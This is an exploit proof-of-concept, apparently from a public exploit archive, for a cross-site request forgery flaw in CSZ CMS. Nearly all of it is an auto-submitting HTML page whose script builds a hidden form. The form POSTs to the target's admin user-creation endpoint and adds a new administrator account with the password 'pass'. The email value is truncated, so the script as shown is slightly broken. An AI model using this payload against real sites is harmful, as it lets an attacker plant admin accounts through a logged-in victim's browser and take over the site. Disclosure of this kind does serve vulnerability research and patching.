Admin)
# Date: 2024-05-03
# Exploit Author: Ahmet ?mit BAYRAM
# Vendor Homepage: https://www.cszcms.com
# Software Link:
https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download
# Version: latest
# Tested on: MacOS
##################################### CSRF PoC
#####################################
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>CSRF PoC</title>
</head>
<body>
<script>
// Create a hidden form
var form = document.createElement("form");
form.setAttribute("method", "POST");
form.setAttribute("action", "http://TARGETSITE/admin/users/new/add");
form.setAttribute("target", "_blank"); // Open in a new tab
// Add form fields
var fields = {
name: "admin",
email: "
password: "pass",
con_password: "pass",
group: "1",
pass_change: "yes",
active: 1
// Add other fields as needed
};
// Append fields to the form
for (var key in fields) {
if (fields.hasOwnProperty(key)) {
var input = document.createElement("input");
input.setAttribute("type", "hidden");
input.setAttribute("name", key);
input.setAttribute("value", fields[key]);
form.appendChild(input);
}
}
// Add the form to the page
document.body.appendChild(form);
// Submit the form
form.submit();
</script>
</body>
</html>
##################################### CSRF PoC Ended
#####################################